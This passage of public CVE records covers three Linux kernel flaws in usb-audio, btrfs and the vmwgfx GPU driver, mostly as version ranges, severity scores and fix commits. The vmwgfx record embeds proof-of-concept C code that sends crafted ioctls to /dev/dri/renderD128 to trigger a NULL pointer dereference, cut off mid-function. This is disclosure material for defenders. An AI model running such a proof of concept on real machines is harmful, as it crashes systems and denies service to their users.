Affected: 04324ccc75f96b3ed7aad1c866d1b7925e977bdf , < a39d51ff1f52cd0b6fe7d379ac93bd8b4237d1b7 (git)

Linux

Affected: 3.8
Unaffected: 0 , < 3.8 (semver)
Unaffected: 4.19.311 , ≤ 4.19.* (semver)
Unaffected: 5.4.273 , ≤ 5.4.* (semver)
Unaffected: 5.10.214 , ≤ 5.10.* (semver)
Unaffected: 5.15.153 , ≤ 5.15.* (semver)
Unaffected: 6.1.83 , ≤ 6.1.* (semver)
Unaffected: 6.6.23 , ≤ 6.6.* (semver)
Unaffected: 6.7.11 , ≤ 6.7.* (semver)
Unaffected: 6.8.2 , ≤ 6.8.* (semver)
Unaffected: 6.9 , ≤ * (original_commit_for_fix)

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "metrics": [
          {
            "cvssV3_1": {
              "attackComplexity": "LOW",
              "attackVector": "NETWORK",
              "availabilityImpact": "LOW",
              "baseScore": 5.3,
              "baseSeverity": "MEDIUM",
              "confidentialityImpact": "NONE",
              "integrityImpact": "NONE",
              "privilegesRequired": "NONE",
              "scope": "UNCHANGED",
              "userInteraction": "NONE",
              "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L",
              "version": "3.1"
            }
          },
          {
            "other": {
              "content": {
                "id": "CVE-2024-27436",
                "options": [
                  {
                    "Exploitation": "none"
                  },
                  {
                    "Automatable": "no"
                  },
                  {
                    "Technical Impact": "partial"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2024-05-21T15:45:09.433584Z",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
        "problemTypes": [
          {
            "descriptions": [
              {
                "cweId": "CWE-787",
                "description": "CWE-787 Out-of-bounds Write",
                "lang": "en",
                "type": "CWE"
              }
            ]
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2024-11-07T20:20:17.657Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "title": "CISA ADP Vulnrichment"
      },
      {
        "providerMetadata": {
          "dateUpdated": "2024-08-02T00:34:52.266Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/7e2c1b0f6dd9abde9e60f0f9730026714468770f"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/6d5dc96b154be371df0d62ecb07efe400701ed8a"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/5cd466673b34bac369334f66cbe14bb77b7d7827"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/9af1658ba293458ca6a13f70637b9654fa4be064"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/629af0d5fe94a35f498ba2c3f19bd78bfa591be6"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/22cad1b841a63635a38273b799b4791f202ade72"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/c8a24fd281dcdf3c926413dafbafcf35cde517a9"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/6d88b289fb0a8d055cb79d1c46a56aba7809d96d"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/a39d51ff1f52cd0b6fe7d379ac93bd8b4237d1b7"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00017.html"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00020.html"
          }
        ],
        "title": "CVE Program Container"
      }
    ],
    "cna": {
      "affected": [
        {
          "defaultStatus": "unaffected",
          "product": "Linux",
          "programFiles": [
            "sound/usb/stream.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "lessThan": "7e2c1b0f6dd9abde9e60f0f9730026714468770f",
              "status": "affected",
              "version": "04324ccc75f96b3ed7aad1c866d1b7925e977bdf",
              "versionType": "git"
            },
            {
              "lessThan": "6d5dc96b154be371df0d62ecb07efe400701ed8a",
              "status": "affected",
              "version": "04324ccc75f96b3ed7aad1c866d1b7925e977bdf",
              "versionType": "git"
            },
            {
              "lessThan": "5cd466673b34bac369334f66cbe14bb77b7d7827",
              "status": "affected",
              "version": "04324ccc75f96b3ed7aad1c866d1b7925e977bdf",
              "versionType": "git"
            },
            {
              "lessThan": "9af1658ba293458ca6a13f70637b9654fa4be064",
              "status": "affected",
              "version": "04324ccc75f96b3ed7aad1c866d1b7925e977bdf",
              "versionType": "git"
            },
            {
              "lessThan": "629af0d5fe94a35f498ba2c3f19bd78bfa591be6",
              "status": "affected",
              "version": "04324ccc75f96b3ed7aad1c866d1b7925e977bdf",
              "versionType": "git"
            },
            {
              "lessThan": "22cad1b841a63635a38273b799b4791f202ade72",
              "status": "affected",
              "version": "04324ccc75f96b3ed7aad1c866d1b7925e977bdf",
              "versionType": "git"
            },
            {
              "lessThan": "c8a24fd281dcdf3c926413dafbafcf35cde517a9",
              "status": "affected",
              "version": "04324ccc75f96b3ed7aad1c866d1b7925e977bdf",
              "versionType": "git"
            },
            {
              "lessThan": "6d88b289fb0a8d055cb79d1c46a56aba7809d96d",
              "status": "affected",
              "version": "04324ccc75f96b3ed7aad1c866d1b7925e977bdf",
              "versionType": "git"
            },
            {
              "lessThan": "a39d51ff1f52cd0b6fe7d379ac93bd8b4237d1b7",
              "status": "affected",
              "version": "04324ccc75f96b3ed7aad1c866d1b7925e977bdf",
              "versionType": "git"
            }
          ]
        },
        {
          "defaultStatus": "affected",
          "product": "Linux",
          "programFiles": [
            "sound/usb/stream.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "status": "affected",
              "version": "3.8"
            },
            {
              "lessThan": "3.8",
              "status": "unaffected",
              "version": "0",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "4.19.*",
              "status": "unaffected",
              "version": "4.19.311",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.4.*",
              "status": "unaffected",
              "version": "5.4.273",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.10.*",
              "status": "unaffected",
              "version": "5.10.214",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.15.*",
              "status": "unaffected",
              "version": "5.15.153",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.1.*",
              "status": "unaffected",
              "version": "6.1.83",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.6.*",
              "status": "unaffected",
              "version": "6.6.23",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.7.*",
              "status": "unaffected",
              "version": "6.7.11",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.8.*",
              "status": "unaffected",
              "version": "6.8.2",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "*",
              "status": "unaffected",
              "version": "6.9",
              "versionType": "original_commit_for_fix"
            }
          ]
        }
      ],
      "cpeApplicability": [
        {
          "nodes": [
            {
              "cpeMatch": [
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "4.19.311",
                  "versionStartIncluding": "3.8",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.4.273",
                  "versionStartIncluding": "3.8",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.10.214",
                  "versionStartIncluding": "3.8",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.15.153",
                  "versionStartIncluding": "3.8",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.1.83",
                  "versionStartIncluding": "3.8",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.6.23",
                  "versionStartIncluding": "3.8",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.7.11",
                  "versionStartIncluding": "3.8",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.8.2",
                  "versionStartIncluding": "3.8",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.9",
                  "versionStartIncluding": "3.8",
                  "vulnerable": true
                }
              ],
              "negate": false,
              "operator": "OR"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "In the Linux kernel, the following vulnerability has been resolved:\n\nALSA: usb-audio: Stop parsing channels bits when all channels are found.\n\nIf a usb audio device sets more bits than the amount of channels\nit could write outside of the map array."
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2025-05-04T09:05:04.457Z",
        "orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
        "shortName": "Linux"
      },
      "references": [
        {
          "url": "https://git.kernel.org/stable/c/7e2c1b0f6dd9abde9e60f0f9730026714468770f"
        },
        {
          "url": "https://git.kernel.org/stable/c/6d5dc96b154be371df0d62ecb07efe400701ed8a"
        },
        {
          "url": "https://git.kernel.org/stable/c/5cd466673b34bac369334f66cbe14bb77b7d7827"
        },
        {
          "url": "https://git.kernel.org/stable/c/9af1658ba293458ca6a13f70637b9654fa4be064"
        },
        {
          "url": "https://git.kernel.org/stable/c/629af0d5fe94a35f498ba2c3f19bd78bfa591be6"
        },
        {
          "url": "https://git.kernel.org/stable/c/22cad1b841a63635a38273b799b4791f202ade72"
        },
        {
          "url": "https://git.kernel.org/stable/c/c8a24fd281dcdf3c926413dafbafcf35cde517a9"
        },
        {
          "url": "https://git.kernel.org/stable/c/6d88b289fb0a8d055cb79d1c46a56aba7809d96d"
        },
        {
          "url": "https://git.kernel.org/stable/c/a39d51ff1f52cd0b6fe7d379ac93bd8b4237d1b7"
        }
      ],
      "title": "ALSA: usb-audio: Stop parsing channels bits when all channels are found.",
      "x_generator": {
        "engine": "bippy-1.2.0"
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
    "assignerShortName": "Linux",
    "cveId": "CVE-2024-27436",
    "datePublished": "2024-05-17T12:12:40.017Z",
    "dateReserved": "2024-02-25T13:47:42.687Z",
    "dateUpdated": "2025-05-04T09:05:04.457Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.1"
}

CVE-2024-35936 (GCVE-0-2024-35936)

Vulnerability from cvelistv5 – Published: 2024-05-19 10:10 – Updated: 2026-01-05 10:35

Title

btrfs: handle chunk tree lookup error in btrfs_relocate_sys_chunks()

Summary

In the Linux kernel, the following vulnerability has been resolved: btrfs: handle chunk tree lookup error in btrfs_relocate_sys_chunks() The unhandled case in btrfs_relocate_sys_chunks() loop is a corruption, as it could be caused only by two impossible conditions: - at first the search key is set up to look for a chunk tree item, with offset -1, this is an inexact search and the key->offset will contain the correct offset upon a successful search, a valid chunk tree item cannot have an offset -1 - after first successful search, the found_key corresponds to a chunk item, the offset is decremented by 1 before the next loop, it's impossible to find a chunk item there due to alignment and size constraints

Severity ?

No CVSS data available.

Assigner

Linux

References

URL

Tags

	https://git.kernel.org/stable/c/bebd9e0ff90034875…
	https://git.kernel.org/stable/c/576164bd01bd795f8…
	https://git.kernel.org/stable/c/87299cdaae757f3f4…
	https://git.kernel.org/stable/c/d1ffa4ae2d591fdd4…
	https://git.kernel.org/stable/c/36c2a2863bc389624…
	https://git.kernel.org/stable/c/0d23b34c68c46cd22…
	https://git.kernel.org/stable/c/1f9212cdbd005bc55…
	https://git.kernel.org/stable/c/7411055db5ce64f83…

Impacted products

Vendor

Product

Version

Linux

Affected: 2b82032c34ec40515d3c45c36cd1961f37977de8 , < bebd9e0ff90034875c5dfe4bd514fd7055fc7a89 (git)
Affected: 2b82032c34ec40515d3c45c36cd1961f37977de8 , < 576164bd01bd795f8b09fb194b493103506b33c9 (git)
Affected: 2b82032c34ec40515d3c45c36cd1961f37977de8 , < 87299cdaae757f3f41212146cfb5b3af416b8385 (git)
Affected: 2b82032c34ec40515d3c45c36cd1961f37977de8 , < d1ffa4ae2d591fdd40471074e79954ec45f147f7 (git)
Affected: 2b82032c34ec40515d3c45c36cd1961f37977de8 , < 36c2a2863bc3896243eb724dc3fd4cf9aea633f2 (git)
Affected: 2b82032c34ec40515d3c45c36cd1961f37977de8 , < 0d23b34c68c46cd225b55868bc8a269e3134816d (git)
Affected: 2b82032c34ec40515d3c45c36cd1961f37977de8 , < 1f9212cdbd005bc55f2b7422e7b560d9c02bd1da (git)
Affected: 2b82032c34ec40515d3c45c36cd1961f37977de8 , < 7411055db5ce64f836aaffd422396af0075fdc99 (git)

Linux

Affected: 2.6.29
Unaffected: 0 , < 2.6.29 (semver)
Unaffected: 4.19.312 , ≤ 4.19.* (semver)
Unaffected: 5.4.274 , ≤ 5.4.* (semver)
Unaffected: 5.10.215 , ≤ 5.10.* (semver)
Unaffected: 5.15.155 , ≤ 5.15.* (semver)
Unaffected: 6.1.86 , ≤ 6.1.* (semver)
Unaffected: 6.6.27 , ≤ 6.6.* (semver)
Unaffected: 6.8.6 , ≤ 6.8.* (semver)
Unaffected: 6.9 , ≤ * (original_commit_for_fix)

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "metrics": [
          {
            "other": {
              "content": {
                "id": "CVE-2024-35936",
                "options": [
                  {
                    "Exploitation": "none"
                  },
                  {
                    "Automatable": "no"
                  },
                  {
                    "Technical Impact": "partial"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2024-05-20T17:12:29.915009Z",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2024-06-04T17:33:57.902Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "title": "CISA ADP Vulnrichment"
      },
      {
        "providerMetadata": {
          "dateUpdated": "2024-08-02T03:21:49.118Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/bebd9e0ff90034875c5dfe4bd514fd7055fc7a89"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/576164bd01bd795f8b09fb194b493103506b33c9"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/87299cdaae757f3f41212146cfb5b3af416b8385"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/d1ffa4ae2d591fdd40471074e79954ec45f147f7"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/36c2a2863bc3896243eb724dc3fd4cf9aea633f2"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/0d23b34c68c46cd225b55868bc8a269e3134816d"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/1f9212cdbd005bc55f2b7422e7b560d9c02bd1da"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/7411055db5ce64f836aaffd422396af0075fdc99"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00017.html"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00020.html"
          }
        ],
        "title": "CVE Program Container"
      }
    ],
    "cna": {
      "affected": [
        {
          "defaultStatus": "unaffected",
          "product": "Linux",
          "programFiles": [
            "fs/btrfs/volumes.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "lessThan": "bebd9e0ff90034875c5dfe4bd514fd7055fc7a89",
              "status": "affected",
              "version": "2b82032c34ec40515d3c45c36cd1961f37977de8",
              "versionType": "git"
            },
            {
              "lessThan": "576164bd01bd795f8b09fb194b493103506b33c9",
              "status": "affected",
              "version": "2b82032c34ec40515d3c45c36cd1961f37977de8",
              "versionType": "git"
            },
            {
              "lessThan": "87299cdaae757f3f41212146cfb5b3af416b8385",
              "status": "affected",
              "version": "2b82032c34ec40515d3c45c36cd1961f37977de8",
              "versionType": "git"
            },
            {
              "lessThan": "d1ffa4ae2d591fdd40471074e79954ec45f147f7",
              "status": "affected",
              "version": "2b82032c34ec40515d3c45c36cd1961f37977de8",
              "versionType": "git"
            },
            {
              "lessThan": "36c2a2863bc3896243eb724dc3fd4cf9aea633f2",
              "status": "affected",
              "version": "2b82032c34ec40515d3c45c36cd1961f37977de8",
              "versionType": "git"
            },
            {
              "lessThan": "0d23b34c68c46cd225b55868bc8a269e3134816d",
              "status": "affected",
              "version": "2b82032c34ec40515d3c45c36cd1961f37977de8",
              "versionType": "git"
            },
            {
              "lessThan": "1f9212cdbd005bc55f2b7422e7b560d9c02bd1da",
              "status": "affected",
              "version": "2b82032c34ec40515d3c45c36cd1961f37977de8",
              "versionType": "git"
            },
            {
              "lessThan": "7411055db5ce64f836aaffd422396af0075fdc99",
              "status": "affected",
              "version": "2b82032c34ec40515d3c45c36cd1961f37977de8",
              "versionType": "git"
            }
          ]
        },
        {
          "defaultStatus": "affected",
          "product": "Linux",
          "programFiles": [
            "fs/btrfs/volumes.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "status": "affected",
              "version": "2.6.29"
            },
            {
              "lessThan": "2.6.29",
              "status": "unaffected",
              "version": "0",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "4.19.*",
              "status": "unaffected",
              "version": "4.19.312",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.4.*",
              "status": "unaffected",
              "version": "5.4.274",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.10.*",
              "status": "unaffected",
              "version": "5.10.215",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.15.*",
              "status": "unaffected",
              "version": "5.15.155",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.1.*",
              "status": "unaffected",
              "version": "6.1.86",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.6.*",
              "status": "unaffected",
              "version": "6.6.27",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.8.*",
              "status": "unaffected",
              "version": "6.8.6",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "*",
              "status": "unaffected",
              "version": "6.9",
              "versionType": "original_commit_for_fix"
            }
          ]
        }
      ],
      "cpeApplicability": [
        {
          "nodes": [
            {
              "cpeMatch": [
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "4.19.312",
                  "versionStartIncluding": "2.6.29",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.4.274",
                  "versionStartIncluding": "2.6.29",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.10.215",
                  "versionStartIncluding": "2.6.29",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.15.155",
                  "versionStartIncluding": "2.6.29",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.1.86",
                  "versionStartIncluding": "2.6.29",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.6.27",
                  "versionStartIncluding": "2.6.29",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.8.6",
                  "versionStartIncluding": "2.6.29",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.9",
                  "versionStartIncluding": "2.6.29",
                  "vulnerable": true
                }
              ],
              "negate": false,
              "operator": "OR"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "In the Linux kernel, the following vulnerability has been resolved:\n\nbtrfs: handle chunk tree lookup error in btrfs_relocate_sys_chunks()\n\nThe unhandled case in btrfs_relocate_sys_chunks() loop is a corruption,\nas it could be caused only by two impossible conditions:\n\n- at first the search key is set up to look for a chunk tree item, with\n  offset -1, this is an inexact search and the key-\u003eoffset will contain\n  the correct offset upon a successful search, a valid chunk tree item\n  cannot have an offset -1\n\n- after first successful search, the found_key corresponds to a chunk\n  item, the offset is decremented by 1 before the next loop, it\u0027s\n  impossible to find a chunk item there due to alignment and size\n  constraints"
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2026-01-05T10:35:52.195Z",
        "orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
        "shortName": "Linux"
      },
      "references": [
        {
          "url": "https://git.kernel.org/stable/c/bebd9e0ff90034875c5dfe4bd514fd7055fc7a89"
        },
        {
          "url": "https://git.kernel.org/stable/c/576164bd01bd795f8b09fb194b493103506b33c9"
        },
        {
          "url": "https://git.kernel.org/stable/c/87299cdaae757f3f41212146cfb5b3af416b8385"
        },
        {
          "url": "https://git.kernel.org/stable/c/d1ffa4ae2d591fdd40471074e79954ec45f147f7"
        },
        {
          "url": "https://git.kernel.org/stable/c/36c2a2863bc3896243eb724dc3fd4cf9aea633f2"
        },
        {
          "url": "https://git.kernel.org/stable/c/0d23b34c68c46cd225b55868bc8a269e3134816d"
        },
        {
          "url": "https://git.kernel.org/stable/c/1f9212cdbd005bc55f2b7422e7b560d9c02bd1da"
        },
        {
          "url": "https://git.kernel.org/stable/c/7411055db5ce64f836aaffd422396af0075fdc99"
        }
      ],
      "title": "btrfs: handle chunk tree lookup error in btrfs_relocate_sys_chunks()",
      "x_generator": {
        "engine": "bippy-1.2.0"
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
    "assignerShortName": "Linux",
    "cveId": "CVE-2024-35936",
    "datePublished": "2024-05-19T10:10:42.967Z",
    "dateReserved": "2024-05-17T13:50:33.130Z",
    "dateUpdated": "2026-01-05T10:35:52.195Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.2"
}

CVE-2022-38096 (GCVE-0-2022-38096)

Vulnerability from cvelistv5 – Published: 2022-09-09 14:39 – Updated: 2024-09-16 19:46

Title

There is a NULL pointer vulnerability in vmwgfx driver

Summary

A NULL pointer dereference vulnerability was found in vmwgfx driver in drivers/gpu/vmxgfx/vmxgfx_execbuf.c in GPU component of Linux kernel with device file '/dev/dri/renderD128 (or Dxxx)'. This flaw allows a local attacker with a user account on the system to gain privilege, causing a denial of service(DoS).

Severity ?

6.3 (Medium)


                        
                          CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:N/I:L/A:H

CWE

CWE-476 - NULL Pointer Dereference

Assigner

Anolis

References

URL

Tags

	https://bugzilla.openanolis.cn/show_bug.cgi?id=2073
	https://lists.debian.org/debian-lts-announce/2024…	mailing-list

Impacted products

	Vendor	Product	Version
	Linux	kernel	Affected: v4.20-rc1 , < 5.13.0-52* (custom)

Credits

Ziming Zhang(ezrakiez@gmail.com) from Ant Group Light-Year Security Lab

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "affected": [
          {
            "cpes": [
              "cpe:2.3:o:linux:linux_kernel:-:*:*:*:*:*:*:*"
            ],
            "defaultStatus": "unknown",
            "product": "linux_kernel",
            "vendor": "linux",
            "versions": [
              {
                "lessThan": "5.14",
                "status": "affected",
                "version": "v4.20-rc1",
                "versionType": "custom"
              }
            ]
          }
        ],
        "metrics": [
          {
            "other": {
              "content": {
                "id": "CVE-2022-38096",
                "options": [
                  {
                    "Exploitation": "poc"
                  },
                  {
                    "Automatable": "no"
                  },
                  {
                    "Technical Impact": "partial"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2024-06-26T13:45:25.191519Z",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2024-06-26T13:49:29.690Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "title": "CISA ADP Vulnrichment"
      },
      {
        "providerMetadata": {
          "dateUpdated": "2024-08-03T10:45:52.802Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://bugzilla.openanolis.cn/show_bug.cgi?id=2073"
          },
          {
            "name": "[debian-lts-announce] 20240625 [SECURITY] [DLA 3842-1] linux-5.10 security update",
            "tags": [
              "mailing-list",
              "x_transferred"
            ],
            "url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00017.html"
          }
        ],
        "title": "CVE Program Container"
      }
    ],
    "cna": {
      "affected": [
        {
          "product": "kernel",
          "vendor": "Linux",
          "versions": [
            {
              "lessThan": "5.13.0-52*",
              "status": "affected",
              "version": "v4.20-rc1",
              "versionType": "custom"
            }
          ]
        }
      ],
      "credits": [
        {
          "lang": "en",
          "value": "Ziming Zhang(ezrakiez@gmail.com) from Ant Group Light-Year Security Lab"
        }
      ],
      "datePublic": "2022-09-06T00:00:00",
      "descriptions": [
        {
          "lang": "en",
          "value": "A NULL pointer dereference vulnerability was found in vmwgfx driver in drivers/gpu/vmxgfx/vmxgfx_execbuf.c in GPU component of Linux kernel with device file \u0027/dev/dri/renderD128 (or Dxxx)\u0027. This flaw allows a local attacker with a user account on the system to gain privilege, causing a denial of service(DoS)."
        }
      ],
      "exploits": [
        {
          "lang": "en",
          "value": "#include \u003cstdio.h\u003e\n#include \u003cstring.h\u003e\n#include \u003cunistd.h\u003e\n#include \u003cerrno.h\u003e\n\n#include \u003clinux/if_tun.h\u003e\n#include \u003cnet/if.h\u003e\n#include \u003csys/ioctl.h\u003e\n#include \u003csys/types.h\u003e\n#include \u003csys/stat.h\u003e\n#include \u003cfcntl.h\u003e\n#include \u003cpthread.h\u003e\n#include \u003csys/socket.h\u003e\n#include \u003cstring.h\u003e\n#include \u003cunistd.h\u003e\n#include \u003cstdlib.h\u003e\n#include \u003csys/ioctl.h\u003e\n#include \u003cerrno.h\u003e\n#include \u003cstdio.h\u003e\n#include \u003cfcntl.h\u003e\n#include \u003cpthread.h\u003e\n#include \u003cstdio.h\u003e\n#include \u003csys/types.h\u003e\n#include \u003cstdint.h\u003e\n#include \u003cnetinet/ip.h\u003e\n#include \u003csys/resource.h\u003e\n#include \u003csys/syscall.h\u003e\n#include \u003climits.h\u003e\n#include \u003csys/mman.h\u003e\n\n#include \u003clinux/fs.h\u003e\nint fd = 0;\ntypedef struct mixer\n{\n\tint index;\n\tint fd;\n\tchar *msg;\n}mixer_t;\n\nstruct drm_vmw_surface_create_req {\n\t__u32 flags;\n\t__u32 format;\n\t__u32 mip_levels[6];\n\t__u64 size_addr;\n\t__s32 shareable;\n\t__s32 scanout;\n};\nstruct drm_vmw_execbuf_arg {\n\t__u64 commands;\n\t__u32 command_size;\n\t__u32 throttle_us;\n\t__u64 fence_rep;\n\t__u32 version;\n\t__u32 flags;\n\t__u32 context_handle;\n\t__s32 imported_fence_fd;\n};\nvoid init(){\nif ((fd = open(\"/dev/dri/renderD128\", O_RDWR)) == -1)\n                {\n                        printf(\"open tun failed: %s\\n\", strerror(errno));\n                        return -1;\n                }\n       \n}\nvoid poc(int sid){  \nint cmd[0x1000]={0};\ncmd[0]=1165;\ncmd[1]=0x50;\ncmd[2]=0x0;\ncmd[3]=0x0;\ncmd[4]=-1;\nstruct drm_vmw_execbuf_arg arg={0};\n\targ.commands=cmd;\n\targ.command_size=0x100;\n\targ.version=2;  \n\targ.context_handle=sid;\n                if (ioctl(fd, 0x4028644C, \u0026arg) == -1)\n                {\n                        printf(\"ioctl tun failed: %s\\n\", strerror(errno));\n                        return -1;\n                }\n\n}\nint alloc_context(){\n\nint arg[0x10]={0};\narg[0]=0;\narg[1]=0x100;\n\nif (ioctl(fd, 0x80086447, \u0026arg) == -1)\n                {\n                        printf(\"ioctl tun failed: %s\\n\", strerror(errno));\n                        return -1;\n                }\n   return arg[0];         \n}\n\nint alloc_bo(){\n\nint arg[0x10]={0};\narg[0]=0x10000;\nif (ioctl(fd, 0xC0186441, \u0026arg) == -1)\n                {\n                        printf(\"ioctl tun failed: %s\\n\", strerror(errno));\n                        return 